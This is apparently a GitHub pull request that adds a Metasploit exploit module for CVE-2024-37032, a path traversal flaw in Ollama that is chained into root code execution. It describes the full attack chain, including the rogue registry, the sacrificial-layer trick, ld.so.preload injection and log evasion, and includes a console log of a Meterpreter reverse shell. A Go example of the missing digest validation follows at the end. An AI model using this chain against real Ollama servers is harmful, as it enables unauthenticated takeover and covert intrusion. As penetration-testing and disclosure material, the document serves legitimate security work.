Add Ollama path traversal RCE module (CVE-2024-37032) #21006

Open
Chocapikk wants to merge 3 commits into rapid7:master from Chocapikk:ollama-rce-cve-2024-37032

@Chocapikk
Contributor

Hello Metasploit Team,

This PR adds a new exploit module for CVE-2024-37032 ("Probllama"), a path traversal vulnerability in Ollama < 0.1.34 that chains into unauthenticated RCE as root.

Summary

Ollama's model pull mechanism accepts OCI manifests where the digest field is not validated. Instead of enforcing sha256:<64hex>, it accepts arbitrary path traversal sequences (../../../etc/ld.so.preload). This allows a rogue OCI registry to write arbitrary files on the server.

Existing public PoCs (jakabakos, Bi0x) only demonstrate file read/write. This module is the first to chain the arbitrary write into a full RCE with a session.

Exploitation flow

The module starts a rogue OCI registry (HttpServer mixin) and performs three steps against the target:

  1. Pull 1 (path traversal write) - Serves a malicious manifest with three layers. The first layer is sacrificial (absorbs Ollama's SHA256 digest verification failure and gets deleted). The remaining two layers persist unverified: a shared library containing the payload as a DT_INIT constructor, and /etc/ld.so.preload pointing to it.

  2. Pull 2 (trigger model registration) - Serves a valid model with correct SHA256 digests and a minimal GGUF header. Ollama registers this model, making it available for /api/chat. The module then aliases it to a random name and deletes the original to remove the attacker's URL from /api/tags.

  3. Trigger (/api/chat) - Ollama spawns the llama.cpp runner process. The dynamic linker reads /etc/ld.so.preload and loads the malicious .so. The constructor unlinks ld.so.preload (prevents re-execution), forks (parent returns so the runner starts normally), and the child executes the payload via mmap + memcpy to an RWX page. The trigger model is deleted in an ensure block regardless of outcome.

Key techniques

  • Sacrificial layer trick - Ollama verifies layer digests after download. The first traversal layer fails verification and is deleted, but Ollama stops verifying after the first failure, so remaining layers persist on disk.
  • Metasm C constructor - The .so is compiled from C using Metasm::ELF.compile_c with extern libc declarations for fork, unlink, setsid, mmap, memcpy. No raw assembly.
  • Faker model names - Model namespaces and aliases are generated with Faker::Hacker to avoid obvious IOC strings in Ollama's logs.
  • Zero leftover artifacts - FileDropper cleans up the .so, the constructor unlinks ld.so.preload, and both the trigger model and its alias are deleted via the Ollama API.

Vulnerable versions

  • Ollama < 0.1.34 (all platforms, but this module targets Linux x64)
  • The default Docker image runs as root with the API bound to 0.0.0.0:11434 (no authentication)

Verification

Ollama 0.1.33 on Docker (Linux x64)

msf6 > use exploit/linux/http/ollama_rce_cve_2024_37032
[*] No payload configured, defaulting to linux/x64/meterpreter/reverse_tcp
msf6 exploit(linux/http/ollama_rce_cve_2024_37032) > set RHOSTS 127.0.0.1
RHOSTS => 127.0.0.1
msf6 exploit(linux/http/ollama_rce_cve_2024_37032) > set LHOST 172.17.0.1
LHOST => 172.17.0.1
msf6 exploit(linux/http/ollama_rce_cve_2024_37032) > set SRVHOST 172.17.0.1
SRVHOST => 172.17.0.1
msf6 exploit(linux/http/ollama_rce_cve_2024_37032) > set SRVPORT 8088
SRVPORT => 8088
msf6 exploit(linux/http/ollama_rce_cve_2024_37032) > run

[*] Started reverse TCP handler on 172.17.0.1:4488
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Ollama 0.1.33 (vulnerable to path traversal)
[*] Using URL: http://172.17.0.1:8088/
[*] Rogue OCI registry on 172.17.0.1:8088
[*] Pull 1: 172.17.0.1:8088/haptic-driver/model (path traversal write)
[+] Payload .so and ld.so.preload written via path traversal
[*] Pull 2: 172.17.0.1:8088/wireless-protocol/model (registering trigger model)
[+] Trigger model registered
[*] Triggering RCE via /api/chat (spawning runner process)...
[*] Transmitting intermediate stager...(126 bytes)
[*] Sending stage (3090404 bytes) to 172.17.0.5
[+] Deleted /tmp/CEFMQeff.so
[*] Meterpreter session 1 opened (172.17.0.1:4488 -> 172.17.0.5:48630)

meterpreter > getuid
Server username: root
meterpreter > sysinfo
Computer     : 6078642134f2
OS           : Debian 12.5 (Linux 6.14.0-123037-tuxedo)
Architecture : x64
Meterpreter  : x64/linux

dledda-r7 added the module and rn-modules (release notes for new or majorly enhanced modules) labels on Feb 23, 2026
msutovsky-r7 self-assigned this on Feb 23, 2026
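
The check the Summary describes as missing, as an added example (not code from this PR or from Ollama): every digest in a pulled manifest must match sha256:<64hex>, and the config and all layers are validated before any blob path is derived, so one bad entry rejects the whole pull. The manifest shape, the `/tmp/blobs` directory, the `sha256-<hex>` file naming and the sample manifests are assumptions constructed for this example.

```go
package main

import (
	"encoding/json"
	"fmt"
	"path/filepath"
	"regexp"
	"strings"
)

// Strict form named in the PR description: sha256:<64 hex characters>.
var digestRe = regexp.MustCompile(`^sha256:[0-9a-f]{64}$`)

type layer struct{ Digest string }
type manifest struct {
	Config layer
	Layers []layer
}

// checkManifest validates the config and every layer digest before any blob
// path is built. The "sha256-<hex>" naming under blobsDir is an assumption.
func checkManifest(raw []byte, blobsDir string) ([]string, error) {
	var m manifest
	if err := json.Unmarshal(raw, &m); err != nil {
		return nil, err
	}
	paths := []string{}
	for _, l := range append([]layer{m.Config}, m.Layers...) {
		if !digestRe.MatchString(l.Digest) {
			return nil, fmt.Errorf("rejected digest %q", l.Digest)
		}
		name := strings.Replace(l.Digest, ":", "-", 1)
		paths = append(paths, filepath.Join(blobsDir, name))
	}
	return paths, nil
}

// sampleManifest builds a constructed manifest whose last layer digest is d.
func sampleManifest(d string) []byte {
	ok := "sha256:" + strings.Repeat("ab", 32)
	return []byte(fmt.Sprintf(`{"config":{"digest":%q},"layers":[{"digest":%q},{"digest":%q}]}`, ok, ok, d))
}

func main() {
	for _, d := range []string{"sha256:" + strings.Repeat("cd", 32), "../../../etc/ld.so.preload"} {
		paths, err := checkManifest(sampleManifest(d), "/tmp/blobs")
		fmt.Println(len(paths), err)
	}
}
```

Because the pattern admits only lowercase hex after `sha256:`, a digest that passes cannot contain a path separator or a `..` component.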